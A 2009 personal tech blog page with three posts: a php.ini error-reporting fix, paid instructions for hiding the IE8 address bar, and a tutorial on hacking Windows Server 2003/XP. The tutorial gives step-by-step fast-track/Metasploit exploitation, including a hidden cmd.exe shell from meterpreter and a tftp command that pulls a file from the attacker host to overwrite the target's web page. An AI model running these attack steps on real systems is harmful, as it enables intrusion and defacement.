Friday, December 18, 2009

php NOTICE and DEPRECATED wamp server errors

to fix this on the wamp server or others that have PHP
locate this line in php.ini file:
error_reporting = E_ALL

change it to this line:
error_reporting = E_ALL & ~E_NOTICE & ~E_DEPRECATED

Monday, December 7, 2009

how to hack windows server 2003 or xp systems

For those not farmiar with hacking, it is a concept of exploration and education.
This post is for educational purposes only and this bug has been patched by latest Microsoft patches.

A great hacking/exploration tool is called backtrack which is a linux distribution but more on that later...

Found a great video to get started: watch the video: http://uploads.blip.tv/file/576639

Basic instructions drawn for this and other videos - in this example; getting into the system with the purpose of adding a webpage to the target (in this case windows server 2003):

1. Log in to backtrack (startx for gui)
2. Start fast-track and choose exploit, enter IP and choose bind.
3. If there are sessions after the attack attempts then type:
sessions -i 1

Basic syntax:
sessions -i ID

4. To get to shell from meterpreter type:
execute -f cmd.exe -c -H -i

5. In another shell start BT tftp service, put your file to /tmp

6. Then get the file from the remote host (BT) in shell via tftp:
tftp -i 192.168.1.101 get /tmp/index.htm c:\inetpub\wwwroot\index.htm

syntax:
tftp -i SERVER_IP get SOURCE_LOCATION TARGET_LOCATION

Note: it turns out that windows server 2003 service pack 1 and up has disabled tftp. So only SP0 will allow this trick. If you encounter those servers you must use another method or start tftp in some manner to transfer the backdoor or whatever you want. In my case I simply used echo to type a sample text into a file created by the command, I called index.html

Remember to be a White hat hacker and let me know how it goes!

Thursday, December 3, 2009

Hide IE8 address bar - leaving back, forward, stop and print buttons

Please purchase the instructions for $4.99USD  (a value of over $100 for Microsoft support) :










1. Get the scripts and icon files for each function e.g. back.html and back.ico (get it here [Download]).
2. Place these in C:\IENav -- make new folder on C drive called IENav
3. Custom reg key to add launch paths and register the guid of the API's for these controls. IE8 with nav controls.txt [View or Download]

4. Run/Merge the custom reg file to add controls to the registry. (Does not require a reboot) Once done open IE7-8 and the Address Bar should now be hidden with the new navigation controls placed on the command bar.
I've renamed the vb and reg files with a txt extension so there aren't any issues with firewalls etc. You will just need to remove the .txt extension.

The icon, html and/or javascript files should all reside in your own folder called IENav and should sit directly under C:\ drive. (See Toolbar.vbs or Toolbar.reg).

If you wish to change this location then you will need to edit the Toolbar.vbs or Toolbar.reg (Whichever option you choose) to point to the new location.

The files (first download above) are for IE7 users however IE8 users can still use these files but will need to rename the .js files from .js to .html, e.g refresh.js would become refresh.html.  
You will also need to edit the vb script or reg key (which ever they use) and change any reference to .js to .html.

[Update Nov. 2011] if you would like to also add print and stop buttons download (mirror)

If you have questions or comments you can leave them below or email to theborisedu at gmail dot com
[Special thanks to Scott Alchin (salchin1 at exemail dot com dot au), read my "how to lock down internet explorer 8 with GPO registry" instructions/article and contributed the instructions above]